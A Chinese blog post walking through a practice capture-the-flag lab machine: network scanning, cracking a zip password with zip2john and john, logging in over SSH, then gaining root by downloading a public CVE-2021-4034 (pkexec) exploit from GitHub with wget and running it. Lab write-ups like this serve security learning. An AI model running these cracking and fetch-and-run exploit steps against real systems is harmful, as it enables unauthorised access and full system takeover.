一、启动环境(下载地址)

这个靶场竟然有图形化界面!?

打开kali

二、开始操作

nmap扫描

nmap 192.168.183.0/24

http访问

发现80端口打开,还有ftp和ssh,先访问一下80

漂移蓝再次被黑客入侵,所以现在被称为滴落蓝 :D 哈哈哈

来自

特拉维斯斯科特与暴徒

彳亍,目测没有更多信息了,信息收集一下

robots.txt

.txt文件可以直接访问,看一下

你好亲爱的黑客崇拜者,

去找这个歌词:

https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html

计算 n 个单词并将它们并排放置然后 md5sum 它

即,hellohellohellohello >> md5sum hellohellohellohello

这是ssh的密码

emmmm有一个外部网站,似乎计算出md5是ssh密码,先访问一下

什么东西。。。(研究了一会不会,查攻略也没查到)

ftp访问

发现一个压缩包,解压一下,发现需要密码

john破解压缩包

kali zip2john先破解一下respectmydrip.zip:

zip2john respectmydrip.zip > 1.hash 获得中间hash文件

john --wordlist=/usr/share/wordlists/rockyou.txt 1.hash 破解hash文件

得到密码072528035

secret.zip好像破不出来,先放一边

查了查攻略,之前robots.txt里边的目录可以推测出有文件包含漏洞

得到一个密码,试了一下不是secret.zip的密码,可能是ssh的登录密码

ssh thugger@192.168.183.134 ssh登录->yes->输入密码

上来了,拿到第一条flag

提权

利用内核版本漏洞提权貌似不行,靶机上没有gcc,于是我又双叒叕查了查

ps -aux 查看正在运行的进程

找到这个(漏洞分析)

在github上找到这个软件的漏洞

wget https://github.com/nikaiw/CVE-2021-4034/archive/refs/heads/master.zip 在github上下载

unzip master.zip 下载好之后解压

cd CVE-2021-4034-master/ 解压好之后进入目录

python3 cve2021-4034.py 执行python文件

(掉网了一次,下载解压的过程没了)

文章作者: 永恒的二师兄
版权声明: 本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 永恒的二师兄
信息安全 靶场 kali
喜欢就支持一下吧